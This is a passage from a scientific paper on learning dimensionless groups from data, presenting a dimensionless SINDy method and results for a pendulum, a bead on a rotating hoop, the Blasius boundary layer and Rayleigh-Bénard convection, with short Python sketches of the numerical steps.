\subsection{Sparse identification of dimensionless equations}
\label{sec:methods-sindy}
The previous two methods addressed the problem of data-driven non-dimensionalization by simultaneously optimizing for the fitting function $\psi$ and the dimensionless groups $\bm \pi$.
In light of the fact that $\psi$ is usually the solution of a differential equation, we propose casting the problem as a sparse identification of differential equations (SINDy)~\cite{brunton2016discovering,rudy2017data} with candidate dimensionless groups as coefficients.
This constrains the dimensionless groups to be physically meaningful according to their associated differential operators that act on the unknown output variables, which is also the intuition often used in classical non-dimensionalization.
In the following formulation, we assume that the time $t$ is the only dependent variable, and non-dimensionalize it separately from the rest of the input parameters.
However, the method can be generalized to any number of dependent variables.
For a dimensionless quantity of interest $\boldsymbol{\pi}_q(t)$, our goal is to learn an equation of the form
\begin{equation}
\dv{\boldsymbol{\pi}_q}{t} \equiv \frac{1}{T} \dv{\boldsymbol{\pi}_q}{\tau} = \mathcal F(\boldsymbol{\pi}_q; \boldsymbol{\pi}_p),
\end{equation}
where $T$ is a characteristic time scale, $\tau = t/T$ is the corresponding dimensionless time, $\boldsymbol{\pi}_p$ is a vector of dimensionless parameters, and $\mathcal F$ is a differential operator.
In the absence of a governing equation, SINDy approximates $\mathcal F$ by a sum of differential operators with fitting coefficients that are optimized for both sparsity and prediction error~\cite{brunton2016discovering}. That is, given input-output pairs $\left\{ \bm \pi_p, \bm \pi_q \right\}$ sampled from a time series, SINDy minimizes the loss
\begin{equation}\label{eq:sindy-loss}
\mathcal L_\text{SINDy}(\bm \pi_q, \bm \pi_p, T ;\bm \Xi) = \left\| \frac{1}{T} \dv{\bm \pi_q}{\tau} - \bm \Theta\left(\bm \pi_q, \bm \pi_p ; T\right) \bm \Xi \right\|_2^2 + \lambda \left\| \bm \Xi \right\|_0,
\end{equation}
where $\bm \Xi$ contains unknown fitting coefficients and $\bm \Theta$ is a pre-determined library of potential candidate functions and differential operators, a linear combination of which makes up the approximation $\mathcal F = \bm \Theta\left(\bm \pi_q, \bm \pi_p\right) \bm \Xi$. For dimensional consistency, derivatives in the dependent variable $t$ are scaled by an unknown problem specific timescale $T$, which we assume can be expressed as a function of the input parameters: $T = T(\mathbf p)$.
In essence, the timescale $T$ is treated in the same manner as the dimensionless groups $\bm \pi$, except that its dimensions are constrained to be those of time.
Assuming that $\mathcal F(\boldsymbol{\pi}_q; \boldsymbol{\pi}_p)$, and its corresponding dictionary $\bm \Theta$, are \emph{separable}, we can write
\begin{equation}
\label{eq:sindy-ansatz}
\bm \Theta(\boldsymbol{\bm \pi}_q; \boldsymbol{\pi}_p, T) = \bm g(\bm \pi_p) \otimes \hat{\bm{\Theta}}(\boldsymbol{\pi}_q, T),
\end{equation}
where $\hat{\bm{\Theta}}$ is a dictionary of $s$ derivatives in the dimensionless quantity of interest $\bm \pi_q$, $\bm \pi_p$ is a vector of dimensionless input parameters excluding time, $\bm g()$ is a dictionary of polynomial functions, and $\otimes$ is the Kronecker product, i.e. a vectorization of the outer product of two vectors.
The assumption of separability is not strictly necessary; candidate functions may be chosen that are functions of both $\bm \pi_p$ and $\bm \pi_q$.
However, SINDy libraries are often constructed as multinomials, so that the variables are separable.
Moreover, the parameters typically appear as coefficients of the state variable in both bifurcation normal forms and Taylor series approximations of dynamical systems, so the assumption of separability is natural.
The resulting feature vector has dimension $\bm \Theta(\bm \pi_q; \bm \pi_p) \in {\mathbb R}^{ns}$.
Given $m$ measurements, the full dictionary has dimensions $\bm{\Theta} \in {\mathbb R}^{m\times ns}$, where every row is an example (i.e. a sample in time) and every column a potential term in the differential equation. Accordingly, $\bm \Xi \in {\mathbb R}^{ns \times k'}$, where $k'$ is the dimension of $\bm \pi_q$.
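Under the separability assumption, the library of equation~\eqref{eq:sindy-ansatz} is a row-wise Kronecker product. The sketch below uses an illustrative choice of dictionaries (a linear $\bm g$ and a cubic $\hat{\bm\Theta}$), not the exact library used in the results.

```python
import numpy as np

def sindy_library(pi_q, dpi_q, Pi_p):
    """Separable library: every polynomial term in pi_p multiplies every
    term of a small dictionary in (pi_q, dpi_q/dtau)."""
    g = np.column_stack([np.ones_like(pi_q), Pi_p])           # [1, pi_p, ...]
    theta_hat = np.column_stack([pi_q, pi_q ** 3, dpi_q])     # illustrative terms
    # Row-wise Kronecker product, shape (m, n * s).
    return np.einsum("mi,mj->mij", g, theta_hat).reshape(len(pi_q), -1)

pi_q = np.array([1.0, 2.0])
dpi_q = np.array([0.5, 0.25])
Pi_p = np.array([[3.0], [4.0]])
Theta = sindy_library(pi_q, dpi_q, Pi_p)
# First row: [1*1, 1*1, 1*0.5, 3*1, 3*1, 3*0.5]
```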
While equation \eqref{eq:sindy-loss} takes dimensionless pairs as input data, we would also like to optimize over candidate non-dimensionalizations. That is, we would like to minimize the following loss function
\begin{equation}\label{eq:dimless-sindy-loss}
\mathcal L_\text{dSINDy}(\mathbf q, \mathbf p; \bm \Xi, \bm \Phi) = \mathcal L_\text{SINDy}\left( \bm \pi_p( \mathbf p; \bm \Phi), \bm \pi_q( \mathbf q; \bm \Phi), T(\mathbf p, \bm \Phi); \bm \Xi \right),
\end{equation}
where the input-output pairs $(\mathbf p, \mathbf q)$ are sampled from the dimensional data, and $\bm \Phi$ is the Pi-groups powers matrix that defines the mapping $\bm \pi(\mathbf x; \bm \Phi) = \exp(\log(\mathbf x) \bm \Phi )$ given by equation~\eqref{eq:ptopi-mat}.
Equation \eqref{eq:dimless-sindy-loss} does not include a constraint on ${\bm \Phi}$ (Eq.~\eqref{eq:nulleqn}) to ensure that $\bm \pi$ is dimensionless. To address this issue, we generate a finite number of candidate dimensionless numbers up to a predetermined fractional power that satisfy equation~\eqref{eq:nulleqn}. The resulting set of non-dimensionalizations correspond to a set of power matrices $\bm {\bar \Phi} = \{\bm {\bar \Phi}_1, \bm {\bar \Phi}_2, \ldots, \bm {\bar \Phi}_r\}$ over which we minimize the loss
\begin{equation}
\check{\bm{\Xi}}, \check{\bm{\Phi}} = \argmin_{\bm \Xi, i} \mathcal L_\text{dSINDy}(\mathbf p, \mathbf q; \bm \Xi, \bm{\bar \Phi}_i),
\end{equation}
where $i \in \{1, \ldots, r\}$, and $r$ depends on the range of predetermined powers from which dimensionless numbers are sampled according to the null-space condition in \eqref{eq:nulleqn}.
To avoid this ``brute-force'' search, the dimensionless SINDy method could be combined with the constrained optimization approach described in Sec.~\ref{sec:constrained-opt}.
In general, this tactic would be more flexible, since it also allows for non-integer powers in the dimensionless groups.
We use brute-force enumeration in this work because we expect integer powers, there are relatively few nullspace vectors, and the sparse regression problem can be solved efficiently, so the method scales well in this particular case; its general computational cost is discussed in the results, and we leave a more efficient approach to future work.
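The candidate-generation step can be sketched as a filter over small integer exponent vectors. This is our own minimal version; its cost grows as $(2p_{\max}+1)^d$, which is why the maximum power must be kept small.

```python
import itertools
import numpy as np

def candidate_pi_groups(D, max_power=2):
    """Enumerate integer exponent vectors phi with |phi_i| <= max_power
    and D @ phi = 0 (the trivial zero vector excluded).

    Cost is (2 * max_power + 1) ** D.shape[1], so keep max_power small.
    """
    powers = range(-max_power, max_power + 1)
    out = []
    for phi in itertools.product(powers, repeat=D.shape[1]):
        phi = np.array(phi)
        if phi.any() and not (D @ phi).any():
            out.append(phi)
    return out

# Pendulum-style inputs (g, L, t): only +/- (g t^2 / L) survive.
D_p = np.array([[1, 1, 0], [-2, 0, 1]])
cands = candidate_pi_groups(D_p)
```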
In summary, this method solves two problems at once, providing
\begin{enumerate}
\item Dimensionless input parameters $\boldsymbol{\pi}_p$ and dimensionless dependent variables $\tau = t/T$.
\item A sparse and parametric dynamical system $\dot{\bm \pi}_q = \mathcal F(\bm \pi_q; \bm \pi_p)$.
\end{enumerate}
While we only consider time as a dependent variable in this section, a generalization to spatial and other dependent variables is straightforward. The method also allows for combining known dimensionless numbers with unknown ones as often encountered in practical problems.
\newpage
\section{Results}
In this section, we apply the three methods presented above to four non-dimensionalization problems: the harmonic oscillator in Sec.~\ref{sec:results-pendulum}, the bead on a rotating hoop in Sec.~\ref{sec:rotating-hoop}, the Blasius boundary layer in Sec.~\ref{sec:results-blasius}, and the Rayleigh-B\'enard problem in Sec.~\ref{sec:rayleigh-benard}. We discuss the advantages and shortcomings of each method in terms of accuracy, robustness, and speed in the context of our proposed hypothesis.
\subsection{Non-dimensionalization as optimal change of variables: harmonic oscillator}
\label{sec:results-pendulum}
Dimensionless groups can act as scaling parameters (i.e. revealing self-similarity), as they often arise in analytical solutions. In some problems, Pi-groups can be deduced from an optimal change of variables without the need for a Buckingham Pi constraint. While this is not always the case, it supports the hypothesis that an optimal mapping between input and output data gives rise to a physically meaningful change of variables. We demonstrate this point on the simple pendulum problem described in Sec.~\ref{sec:methods} and shown in Fig.~\ref{fig:approaches}.
We evaluate the output prediction, $\alpha$, at 100 parameter combinations of the inputs $L$, $m$ and $g$ sampled from a uniform distribution, and at 100 time steps, $t$. In this problem, we employ the BuckiNet architecture \emph{without the Buckingham Pi constraint} (i.e. without $\mathcal L_\text{null}$) with four inputs $[L, m, g, t]$, one perceptron in the first hidden layer, a dimensionless output $\alpha$, 3 layers with 8 perceptrons each for $\psi$, and an exponential linear unit (ELU) activation function. The resulting dimensionless group in the BuckiNet layer is
\begin{equation}
\pi_p = \frac{gt^2}{L},
\end{equation}
which appears in the solution of the linear approximation of a harmonic oscillator as
\begin{equation}
\alpha(t) = \alpha_0\cos(\sqrt{\pi_p} + \theta),
\end{equation}
where $\theta$ is a constant that depends on the initial condition. This is a case where a change of variables that gives the simplest analytical solution is dimensionless. However, this is not generally the case, especially in higher dimensional problems. To fully take advantage of the Buckingham Pi constraint, we apply the three methods proposed in Sec.\ref{sec:methods} in the following examples.
\subsection{Bead on a rotating hoop}
\label{sec:rotating-hoop}
Consider a wire hoop with radius $R$, rotating about a vertical axis coinciding with its diameter at an angular velocity $\omega$, as shown in Fig.~\ref{fig:neural-nondim}. A bead with mass $m$ slides along the wire with tangential damping coefficient $b$. The equation governing the dynamics of the angular position $x$ of the bead with respect to the vertical axis is given by (\cite{strogatz2018nonlinear} sec. 3.5)
\begin{equation}\label{eq:rothoop}
m R \ddot{x} = -b \dot{x} - m g \sin x + m R \omega^2 \sin x \cos x.
\end{equation}
A traditional dimensional analysis leads to the following Pi-groups~\cite{strogatz2018nonlinear}
\begin{equation}
\label{eq:hoop-numbers}
\gamma = \frac{R \omega^2}{g}, \hspace{2cm} \epsilon = \frac{m^2 g R}{b^2}, \hspace{2cm} \tau = \frac{mg}{b} t,
\end{equation}
where $\epsilon$ controls the inertial term and $\gamma$ is a pitchfork bifurcation parameter that accounts for two additional fixed points at $x^* = \pm \arccos(1/\gamma)$ for $\gamma > 1$.
Non-dimensionalizing equation \eqref{eq:rothoop} gives
\begin{equation}
\label{eq:hoop-nondim}
\epsilon \frac{d^2 x}{d \tau^2} = - \frac{d x}{d \tau} - \sin x + \gamma \sin x \cos x.
\end{equation}
For $\epsilon \ll 1$ and $\gamma = \mathcal{O}(1)$, the system is overdamped and approximately first-order.
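For reference, the dimensionless model~\eqref{eq:hoop-nondim} is straightforward to simulate; the sketch below (our own, with illustrative parameter values) confirms the extra stable fixed point at $x^* = \arccos(1/\gamma)$ for $\gamma > 1$.

```python
import numpy as np
from scipy.integrate import solve_ivp

def hoop_rhs(tau, state, eps, gamma):
    """Dimensionless bead-on-a-hoop dynamics:
    eps * x'' = -x' - sin(x) + gamma * sin(x) * cos(x)."""
    x, v = state
    return [v, (-v - np.sin(x) + gamma * np.sin(x) * np.cos(x)) / eps]

# Illustrative values: gamma = 2 > 1, so a bead started at x > 0 should
# settle on the pitchfork branch x* = arccos(1/gamma) = pi/3.
sol = solve_ivp(hoop_rhs, (0.0, 50.0), [0.1, 0.0], args=(0.5, 2.0),
                rtol=1e-8, atol=1e-10)
x_final = sol.y[0, -1]
```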
\begin{table}[b]
\begin{center}
\begin{tabular}{ |c||c|c|c|c|c|}
\hline
$\bm \Phi$ & $m$ & $R$ & $b$ & $g$ & $\omega$ \\
\hline
$\phi(\pi_1)$ & 0.0011 & 1.000 & 0.0001 & -0.997 & 1.990\\
$\phi(\pi_2)$ & 1.991 & 1.000 & -1.990 & 0.998 & 0.002 \\
\hline
\end{tabular}
\captionof{table}{Discovered Pi-groups powers with BuckiNet.}
\label{tab:buckinet-hoop-result}
\end{center}
\end{table}
To test the BuckiNet and the constrained optimization algorithms, we solve the governing equations numerically to obtain 3000 solutions with mass, radius, damping coefficient, and angular velocity sampled from a uniform distribution. In order to recover $\gamma$ and $\epsilon$ without explicitly accounting for the time scale, we use a principal component analysis (PCA) of the time-series solution matrix (where each row corresponds to a different parameter combination, and each column to a different time sample), so that the output $\bm \pi_q$ is the set of coefficients for the leading $r$ principal components, as shown in Fig.~\ref{fig:neural-nondim}. Here $\bm \pi_q \equiv \mathbf q = x$ because the angle $x$ is dimensionless. A sample of the time-series solutions for different parameters is shown in Fig.~\ref{fig:sindy-hoop}.
\begin{figure}[t]
\begin{center}
\includegraphics[width=\linewidth]{figures/sindy_hoop.pdf}
\caption{Dimensionless SINDy applied on the rotating hoop problem. The discovered SINDy model reproduces the data and identifies the most physically relevant dimensionless groups.}
\label{fig:sindy-hoop}
\end{center}
\end{figure}
After optimizing over neural network hyperparameters -- given the optimal architecture, with enough modes to represent the solution -- BuckiNet recovers the correct dimensionless numbers, shown in Table~\ref{tab:buckinet-hoop-result}. The discovered Pi-groups are scaled to make the power of $R$ unity.
In order to understand the limitations of the method, it is informative to look at sub-optimal solutions. For instance, for some hyperparameters (e.g. network architecture, regularization etc.) BuckiNet and the constrained optimization method give a product of either $\epsilon$ or $\gamma$ and a Pi-group that is closely related to $\tau$ as a solution, such that
\begin{equation}
\phi(\pi_1) = \phi(\pi_2) + c \phi\left(\frac{mg}{\omega b}\right),
\end{equation}
where $c$ is an arbitrary constant, and $mg/(\omega b)$ is the closest approximation of $\tau=mgt/b$, given that $t$ is not included as an input. This shows that a product of multiple Pi-groups is a local minimum that satisfies the Buckingham Pi constraint and spans the solution space in a different coordinate system. However, a hyperparameter optimization over multiple trials consistently results in Pi-groups that closely approximate $\gamma$ and $\epsilon$. This motivates the use of SINDy to further constrain the dimensionless numbers to be coefficients in a differential equation, where they acquire a concrete mathematical meaning as controllers of the dominant balance.
Using the dimensionless SINDy approach, we generate 20 parameter combinations, sampled from a uniform distribution -- in this case, accounting for the time $t$ as an input. The library $\bm \Theta$ contains low-order polynomials in $x$ and $\dot{x}$ that can approximate the trigonometric nonlinearity in~\eqref{eq:rothoop} for relatively small values of $x$.
For each candidate nondimensionalization generated from the nullspace of $\bm D$, the nonconvex optimization problem~\eqref{eq:sindy-loss} is approximated with the simple sequentially thresholded least squares algorithm~\cite{brunton2016discovering}, where the only tuning parameter is a threshold that approximates the $\ell_0$ regularization loss.
\begin{figure}[t]
\vspace{-.35in}
\begin{center}
\includegraphics[width=.99\linewidth]{figures/sindy-dimensionless.pdf}
\vspace{-.1in}
\caption{The dimensionless SINDy approach applied on the rotating hoop problem. i) generate candidate dimensionless numbers and time scales from the nullspace of the input powers matrix $\bm D_p$, ii) choose a combination of Pi-groups and a time scale, iii) cast as a SINDy problem with the chosen Pi-groups as coefficients, iv) choose the combination with the lowest SINDy loss.}
\label{fig:summary-figure}
\end{center}
\end{figure}
Fig.~\ref{fig:summary-figure} shows that the method identifies the same time scale $T = b/mg$ as that proposed by Strogatz~\cite{strogatz2018nonlinear} in equation~\eqref{eq:hoop-numbers}, along with ratios of $\epsilon$ and $\gamma$ which is consistent with equation~\eqref{eq:hoop-nondim} -- divided by $\epsilon$ -- such that
\begin{equation}
\pi_1 = \frac{b^2}{R g m^2} = \frac{1}{\epsilon}, \hspace{2cm} \pi_2 = \frac{b^2 \omega^2}{m^2 g^2} = \frac{\gamma}{\epsilon}.
\end{equation}
Depending on the sparsity threshold in SINDy, models of varying fidelity can be identified.
For example, with a threshold of $10^{-1}$ the algorithm selects a cubic model
\begin{equation}
\dv[2]{x}{\tau} = -0.96 \pi_1 \dv{x}{\tau} - 0.94 \pi_1 x + \pi_2 (0.86x - 0.34x^3),
\end{equation}
while reducing the threshold to $10^{-3}$ results in the seventh-order model
\begin{equation}
\dv[2]{x}{\tau} = - \pi_1 \dv{x}{\tau} -\pi_1(x - 0.16 x^3 + 0.01x^5) + \pi_2( x - 0.66 x^3 + 0.13 x^5 - 0.01 x^7).
\end{equation}
This closely matches the Taylor-series approximation of the true dynamics~\eqref{eq:hoop-nondim}.
Accordingly, an appropriate model can be selected based on a desired tradeoff between accuracy and simplicity. However, higher order models increase the accuracy of the discovered dimensionless groups.
Fig.~\ref{fig:sindy-hoop} tests the generalization of the two models on a set of parameters chosen to be outside the range of the training data (i.e. an extrapolation task).
Although the cubic model captures the qualitative behavior reasonably well, the seventh-order approximation closely tracks the true solution.
\subsection{Laminar boundary layer: identifying self-similarity}
\label{sec:results-blasius}
Non-dimensionalization often arises in the context of scaling and collapsing experimental results to lower dimensions by revealing the self-similarity structure of the solution space.
The discovery of self-similarity is considered an important result in many applications because it reveals universality properties.
There are plenty of such examples in the history of fluid dynamics, particularly in understanding turbulence~\cite{barenblatt1996scaling, Pope2000book}.
Boundary layer theory is an example where nondimensionalization and self-similarity have played a central role in this understanding~\cite{Schlichting1955}.
Using scaling analysis, Prandtl showed that the Navier-Stokes equation describing an incompressible laminar boundary layer flow can be simplified to the \textit{boundary layer equations} in the streamfunction $\Psi$
\begin{equation}
\label{eq:boundary-layer-equations}
\Psi_y \Psi_{xy} - \Psi_x \Psi_{yy} = \nu \Psi_{yyy},
\end{equation}
where the subscripts denote partial differentiation in $x$ and $y$, and $\nu$ is the kinematic viscosity (with units of $L^2/T$). The streamfunction $\Psi$ is defined so that the streamwise and wall-normal velocities are respectively given by
\begin{equation}
u(x, y) = \Psi_y, \qquad v(x, y) = -\Psi_x.
\end{equation}
Although Prandtl's boundary layer equations are themselves a significant simplification and triumph of scaling analysis, they can be further simplified and expressed as an ordinary differential equation with the help of self-similarity.
Blasius took the scaling one step further by showing that if $\Psi(x, y)$ is a solution of~\eqref{eq:boundary-layer-equations}, then so is $\tilde{\Psi}(x, y) = \alpha \Psi(\alpha^2 x, \alpha y) $ for any dimensionless constant $\alpha$.
This in turn implies that $\Psi$ depends on $x$ and $y$ only through the combination $y/\sqrt{x}$.
Defining the dimensionless similarity variable $\eta$ and streamfunction $f = f(\eta)$ as
\begin{equation}
\eta = y \sqrt{\frac{U_\infty}{\nu x} }, \qquad f(\eta) = \frac{\Psi(x, y)}{\sqrt{\nu U_\infty x}},
\end{equation}
with freestream velocity $U_\infty$, the boundary layer equations reduce to the nonlinear boundary value problem
\begin{subequations}
\label{eq:blasius-bvp}
\begin{gather}
f'''(\eta) + \frac{1}{2}f''(\eta) f(\eta) = 0,\\
f(0) = f'(0) = 0, f'(\infty) = 1.
\end{gather}
\end{subequations}
Although there is no known closed-form solution to this problem, it can be analyzed with asymptotic perturbation methods or solved numerically (e.g. with a shooting method to identify an appropriate initial value for $f''(0)$).
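For completeness, the shooting solution of~\eqref{eq:blasius-bvp} takes only a few lines with standard tools; the sketch below brackets the classical value $f''(0) \approx 0.332$.

```python
import numpy as np
from scipy.integrate import solve_ivp
from scipy.optimize import brentq

def blasius_rhs(eta, F):
    """Blasius ODE f''' + 0.5 * f * f'' = 0 as a first-order system
    in F = (f, f', f'')."""
    f, fp, fpp = F
    return [fp, fpp, -0.5 * f * fpp]

def shooting_residual(fpp0, eta_max=10.0):
    """Residual f'(eta_max) - 1 for a guessed initial curvature f''(0)."""
    sol = solve_ivp(blasius_rhs, (0.0, eta_max), [0.0, 0.0, fpp0],
                    rtol=1e-9, atol=1e-9)
    return sol.y[1, -1] - 1.0

fpp0 = brentq(shooting_residual, 0.1, 1.0)
# fpp0 ≈ 0.332, the classical Blasius value for f''(0)
```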
\begin{figure}[t]
\begin{center}
\includegraphics[width=16cm]{figures/krr_blasius.pdf}
\caption{Constrained optimization method for Blasius boundary layer problem, identifying the dimensionless group that collapses the input-output map to a single curve.}
\label{fig:krr-blasius}
\end{center}
\end{figure}
In contrast to the rotating hoop example, in this case the velocity profile is more important than the differential equation itself.
For instance, once the Blasius solution $f(\eta)$ is known, the boundary layer profile can be found by undoing the scaling, e.g. $u(x, y) = U_\infty f'(\eta)$.
The most natural method to directly identify a dimensionless group associated with the boundary layer is therefore the constrained optimization approach introduced in Sec.~\ref{sec:constrained-opt}.
Defining the output quantity of interest as the nondimensional streamwise velocity $\pi_q = u/U_\infty$, the problem is to learn a model for $\pi_q = \psi(\pi_p)$, where $\pi_p$ is an input dimensionless group that can depend on $x, y, U_\infty$, and $\nu$.
In this problem we seek to recover the scaling derived analytically by Blasius and Prandtl, with $\pi_p = \eta$ and $\psi = f'(\eta)$.
We use kernel ridge regression (KRR) with a non-parametric radial basis function to approximate $\psi$.
Accordingly, the constrained optimization~\eqref{eq:constrained-opt} must learn a dimensionless group $\pi_p$ in the nullspace of the units matrix $\bm D$ that leads to a good KRR approximation of $\pi_q$ as a function of $\pi_p$.
We generate data for this example by solving the boundary layer equations~\eqref{eq:boundary-layer-equations} via a shooting method applied to~\eqref{eq:blasius-bvp}.
The free-stream velocity is chosen to be $U_\infty = 0.01~\mathrm{m/s}$ with viscosity $\nu = 10^{-6}~\mathrm{m^2/s}$, close to that of water at room temperature.
The resulting two-dimensional profile $u(x, y)$ is shown in Fig.~\ref{fig:krr-blasius} (top), along with profiles at selected locations of $x$.
100 points in this field are selected randomly as training data, and~\eqref{eq:constrained-opt} is solved with a constrained trust-region method implemented in SciPy.
Specifically, for each candidate nondimensionalization, the kernel ridge regression model with radial basis function kernels (implemented in scikit-learn) is trained and evaluated on the dimensionless parameters computed from the 100 test points.
The KRR model uses a ridge ($\ell_2$) penalty of $10^{-4}$, an $\ell_1$ penalty of $10^{-4}$, and a scale factor of $1$.
Note that in this method, generalization to a test set is not crucial because the model is not used to make predictions, but only as a proxy for the mutual information between the candidate nondimensionalization and the quantity of interest. In other words, the method does not need to address overfitting.
Moreover, since only 100 points are used in training, the performance of the final model can be evaluated against the entire field ($10^4$ points).
The optimization problem is inexpensive but non-convex and sensitive to the initial guess, and thus prone to converging to local minima. To address this issue, we run multiple optimizations (around 20) with different initial guesses and return the solution with the minimum cost.
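As a concrete illustration of the hard constraint in~\eqref{eq:constrained-opt}, the units matrix for this problem can be written down directly. The sketch below (assuming metre-second base units and the variable ordering $(x, y, U_\infty, \nu)$, which are our own choices) checks that candidate exponent vectors lie in the nullspace of $\bm D$, which is exactly the feasibility constraint the trust-region optimizer enforces:

```python
# Units matrix D for (x, y, U_inf, nu); rows hold the exponents of the
# base units (metre, second) carried by each variable.
D = [[1, 1, 1, 2],    # metre:  x ~ m, y ~ m, U_inf ~ m/s, nu ~ m^2/s
     [0, 0, -1, -1]]  # second

def units_residual(p):
    """Return D @ p; the monomial x**p0 * y**p1 * U**p2 * nu**p3 is
    dimensionless iff this residual is zero."""
    return [sum(D[r][j] * p[j] for j in range(4)) for r in range(2)]

# Exponents of the Blasius variable eta = y * sqrt(U_inf / (nu * x)) ...
eta_exp = [-0.5, 1.0, 0.5, -0.5]
# ... and the (rounded) exponents found by the constrained optimization.
learned_exp = [-0.22, 0.46, 0.24, -0.24]
```

Both exponent vectors give a zero residual, i.e., both are valid Pi groups; the data then selects between them through the quality of the KRR fit.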
Fig.~\ref{fig:krr-blasius} compares the discovered nondimensionalization, $y^{0.46} U_\infty^{0.24}/(x^{0.22} \nu^{0.24}) \approx \sqrt{\eta}$, to the Blasius solution. When scaled to make the power of $y$ unity, the discovered dimensionless number is
\begin{equation}
\label{eq:blasius-result}
\pi_p = \frac{y U_\infty^{0.51}}{x^{0.49} \nu^{0.51}} \approx \eta.
\end{equation}
The constrained optimization learns a different but equivalent model, in the sense that $\psi(\pi_p)$ is one-to-one with $f'(\eta)$.
In contrast to a brute-force search over candidate nondimensionalizations generated from vectors of integer exponents, the exponents in this method are floating-point numbers and are arbitrary up to an overall constant.
The scale of the solution is therefore set by a balance between the $\ell_1$ and $\ell_2$ penalties and the scale factor in the radial basis functions; setting the scale equal to one with small penalties thus biases the algorithm towards $\mathcal{O}(1)$ exponents.
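The rescaling is a one-line normalization of the exponent vector; a sketch using the rounded exponents quoted above (so the result differs from~\eqref{eq:blasius-result} in the second decimal):

```python
# Learned exponents of y**0.46 * U**0.24 / (x**0.22 * nu**0.24),
# keyed by variable name (rounded values quoted in the text).
learned = {"x": -0.22, "y": 0.46, "U": 0.24, "nu": -0.24}
rescaled = {k: v / learned["y"] for k, v in learned.items()}  # power of y -> 1

# Exponents of the Blasius variable eta = y * U**0.5 * x**-0.5 * nu**-0.5.
blasius = {"x": -0.5, "y": 1.0, "U": 0.5, "nu": -0.5}
```

The rescaled exponents agree with the Blasius scaling to within a few percent.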
\subsection{Rayleigh-B\'enard convection: learning a normal form}
\label{sec:rayleigh-benard}
Characterizing the onset and behavior of instabilities is crucial for understanding large-scale dynamical systems.
Near a critical point, a reduced-order amplitude equation called the normal form can model the qualitative change in dynamics associated with a bifurcation.
Although the normal form can be deduced analytically~\cite{GuckenheimerHolmes}, numerically~\cite{Meliga2009jfm, Carini2015jfm}, or via symmetry arguments~\cite{Golubitsky1988}, these methods become progressively more challenging with more complex systems.
With the exception of the symmetry analysis, they are also invasive because they require direct access to the (discretized) governing equations.
In this example, we use the SINDy method introduced in Sec.~\ref{sec:methods-sindy} to learn a dimensionless normal form from limited time-series data, along with the corresponding dimensional parameters.
Rayleigh-B\'enard convection is a prototypical example of a system with a global instability that has been used in a range of studies of nonequilibrium dynamics, including pattern formation~\cite{Cross1993}, chaos~\cite{Lorenz1963jas}, and coherent structures in turbulence~\cite{Pandey2018ncomms}.
The system typically consists of a Boussinesq fluid between two plates, where the lower plate is at a higher temperature than the upper plate.
Heat transfer can take place via either conduction or convection, whose relative strength is encapsulated in the dimensionless Rayleigh number.
Below a critical Rayleigh number, the only stable solution is steady conduction between the plates; above it, the density gradient becomes unstable to convection, as shown in the lower panels of Fig.~\ref{fig:sindy-RB}.
\begin{figure}[t]
\begin{center}
\includegraphics[width=0.85\linewidth]{figures/sindy_RB.pdf}
\caption{The dimensionless SINDy method discovers the normal form of the Rayleigh-B\'enard convection problem, with the analytical form of the Rayleigh number appearing as a coefficient.}
\label{fig:sindy-RB}
\end{center}
\end{figure}
For a fluid in the Boussinesq approximation linearized about density $\rho_0$ and temperature $T_0$, the governing equations consist of the conservation of momentum, mass, and energy:
\begin{subequations}
\begin{align}
&\pdv{\mathbf{u}}{t} + (\mathbf{u} \cdot \nabla ) \mathbf{u} = -\rho_0^{-1} \nabla p + \nu \nabla^2 \mathbf{u} - g \alpha (T - T_0)\,\hat{\mathbf{e}}_z \\
&\nabla \cdot \mathbf{u} = 0 \\
&\pdv{T}{t} + (\mathbf{u} \cdot \nabla) T = \kappa \nabla^2 T,
\end{align}
\end{subequations}
along with the boundary conditions that $T(z=0) = T_0$, $T(z=L_z) = T_0 + \Delta T$.
Besides the primitive variables, the system includes gravity $g$, coefficient of thermal expansion $\alpha$, kinematic viscosity $\nu$, and thermal diffusivity $\kappa$.
The flow is typically analyzed in terms of the Rayleigh number $\mathrm{Ra}=g\alpha \Delta T L_z^3 / \nu \kappa$ and Prandtl number $\mathrm{Pr}=\nu/\kappa$.
Although the Prandtl number has a significant impact on the behavior of the flow above the threshold of instability~\cite{Pandey2018ncomms}, the onset of instability itself is not sensitive to the Prandtl number~\cite{Chandrasekhar1961}.
We simulate the nondimensional flow in two dimensions with no-slip boundary conditions on the wall and periodic boundary conditions in the wall-parallel ($x$) direction using the Shenfun spectral Galerkin library~\cite{mortensen2018joss}.
We use a Fourier-Chebyshev discretization with $(N_x, N_z)=(256, 100)$ and choose $L_x = 2\pi L_z$.
The critical point in this simulation is at $\mathrm{Ra}_c \approx 1875$, significantly above the true value of $\mathrm{Ra}_c \approx 1708$.
This is likely due to differences in boundary conditions, wall-parallel domain extent, and the restriction to two dimensions.
We simulate the system at a range of Rayleigh numbers (shown in Fig.~\ref{fig:sindy-RB}) and $\mathrm{Pr}=0.7$.
For each simulation, we dimensionalize the data as follows.
We randomly select a value for $\kappa$ in the range $(0.5, 0.7)~\mathrm{m}^2/\mathrm{s}$, $\Delta T$ in the range $(50, 80)~^\circ\mathrm{C}$, and $\alpha$ in the range $(1 \times 10^{-4}, 5 \times 10^{-4})~1/^{\circ}\mathrm{C}$.
The separation $L_z$ is then computed for consistency with the simulation Rayleigh number, with $g = 9.8~\mathrm{m}/\mathrm{s}^2$.
Likewise, $\nu$ is computed for consistency with the Prandtl number.
Finally, time is dimensionalized based on a free-fall time scale $\sqrt{L_z/g\alpha \Delta T}$.
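This procedure can be sketched as follows; note that we treat $\alpha$ as carrying units of $1/^\circ\mathrm{C}$ so that $\mathrm{Ra}$ is dimensionless, which is an assumption on our part:

```python
import math
import random

def dimensionalize(Ra, Pr=0.7, g=9.8, seed=0):
    """Sample dimensional parameters consistent with a given (Ra, Pr),
    mirroring the data-generation step described in the text."""
    rng = random.Random(seed)
    kappa = rng.uniform(0.5, 0.7)    # thermal diffusivity, m^2/s
    dT = rng.uniform(50.0, 80.0)     # temperature difference, degC
    alpha = rng.uniform(1e-4, 5e-4)  # thermal expansion, 1/degC (assumed units)
    nu = Pr * kappa                  # from Pr = nu / kappa
    # Plate separation from Ra = g * alpha * dT * Lz**3 / (nu * kappa):
    Lz = (Ra * nu * kappa / (g * alpha * dT)) ** (1.0 / 3.0)
    t_ff = math.sqrt(Lz / (g * alpha * dT))  # free-fall time scale
    return kappa, dT, alpha, nu, Lz, t_ff
```

The sampled parameters reproduce the target Rayleigh and Prandtl numbers by construction.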
From eight initial simulation cases, we retain five points close to the bifurcation (black dots in Fig.~\ref{fig:sindy-RB}) to solve the dimensionless SINDy problem and withhold the other three points (red crosses) as test data.
